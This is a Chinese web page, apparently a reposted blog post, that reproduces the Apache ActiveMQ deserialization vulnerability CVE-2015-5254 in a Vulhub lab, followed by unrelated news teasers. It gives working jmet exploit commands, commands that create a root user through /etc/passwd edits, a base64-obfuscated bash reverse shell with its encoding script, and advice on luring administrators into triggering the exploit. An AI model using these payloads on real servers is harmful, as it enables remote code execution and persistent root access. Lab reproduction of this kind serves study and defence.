当前位置: 首页 > 市场动态 > 正文

CVE-2015-5254漏洞复现_动态焦点

时间:2023-04-25 01:02:09 来源: 博客园

1.漏洞介绍。

Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务,集群,Spring Framework 等。Apache ActiveMQ 5.13.0之前 5.x 版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的 Java 消息服务(JMS)ObjectMessage 对象利用该漏洞执行任意代码。


(资料图片)

2.环境介绍。

复现环境采用kali搭建Vulhub。

靶机:172.18.0.1:8161

环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。

3.漏洞利用。

3.1漏洞利用过程简述。

构造(可以使用ysoserial)可执行命令的序列化对象作为一个消息,发送给目标61616端口访问web管理页面,读取消息,触发漏洞

3.2具体过程。

(1)访问web界面并进行登录。

账号:admin密码:admin

(2)使用jmet进行漏洞利用。

首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar//下载jar文件mkdir external//创建external文件夹

执行命令:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 172.18.0.1 61616//创建/tmp/success,同理可进行其他命令的操作

我们返回管理界面,发现添加了一个名为事件的队列。

点击进入

此时已经触发命令执行,我们进入dockor查看

docker ps
docker exec -it b189872443f5  /bin/bash

可以发现tmp目录已创建,进入发现sucess,漏洞利用成功

创建一个用户

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "useradd -g root -s /bin/bash -u 10010 Tom" -Yp ROME  172.18.0.1  61616

触发条件和之前相同,在管理界面去点击队列

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "sed -i "s/test:x:10010/Tom:x:0/g" /etc/passwd" -Yp ROME   172.18.0.1  61616//修改权限 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "echo "Tom:sd123456" | chpasswd" -Yp ROME   172.18.0.1   61616//添加密码

至此,一个权限为root,密码为123456的用户被我们创建成功,之后可以直接进行ssh远程连接

或者将命令换为反弹shell再利用:

bash -i >& /dev/tcp/172.18.0.1/777 0>&1

使用base64编码payload绕过Java机制

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMC4xLzc3NyAwPiYx

附上base64编码脚本

import base64# Sample string to encodestring = "bash -i >& /dev/tcp/172.18.0.1/777 0>&1"# Encoding the stringencoded_string = base64.b64encode(string.encode("utf-8"))# Printing the encoded stringprint(encoded_string.decode("utf-8"))

构建pyload

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMC4xLzc3NyAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 172.18.0.1 61616

使用nc监听端口

反弹shell成功

值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。

标签:

精彩推送

环球看点!陈志明演的电视剧有哪些_陈志明

1、是陈志朋。2、他有开一家店,是卖天珠的,就是那种正宗的天珠,很贵的其实他也是偶尔有演电视,只是...

来源:2023.04.23

【全球快播报】第19章:尝试“变废为宝”

话说,小鹏和小宇刚得知自己班荣获了诗词朗诵大赛一等奖时,那真是一个兴奋得不得了的样子!但是,他们...

来源:2023.04.23

港珠澳大桥主体工程通过国家竣工验收|今热点

IT之家4月22日消息,港珠澳大桥主体工程通过交通运输部、国家发展改革委、国务院港澳办组织的竣工验收。...

来源:2023.04.23

爱丫爱丫歌词by2(爱丫爱丫歌词)

1、是By2唱的《爱丫爱丫》2、把爱留在身边3、窗外有个蓝蓝的天4、落叶那一瞬间记得多穿一件5、一天过了...

来源:2023.04.23

喝酒前吃什么不容易醉而且又不伤胃_喝酒前吃什么有好处 当前关注

喝酒前吃什么不容易醉而且又不伤胃,喝酒前吃什么有好处很多人还不知道,现在让我们一起来看看吧!解答...

来源:2023.04.23

【新要闻】立讯精密:分阶段、积跬步、携手供应链走向绿碳前景

能源的结构转型和零碳目标的达成是一个长期的过程。从中长期看,企业应该如何看待这个机遇和挑战,合理...

来源:2023.04.23

李想有一个「理想」:搞纯电 原创 Sid GeekCar极客汽车 20

今年三月,李想在微博上透露纯电产品规划:「一个鲸鱼(航母)和五个鲨鱼(舰船),组成理想汽车高压电...

来源:2023.04.23

蓝苓口服液的功效与作用说明书_蓝苓口服液 世界视讯

1、蓝苓口服液属于一种非处方累的药品,大多都用于治疗急性咽炎,所致的咽痛咽部灼热累疾病,在使用蓝苓...

来源:2023.04.22

上海cpa什么时候报名|天天快播报

上海的注册会计师报名人员应当于2023年4月6日早8:00-28日晚8:00(网报系统24小时开放)登入网报系统进行...

来源:2023.04.22

新闻快讯

X 关闭

精品推荐

X 关闭

新闻快讯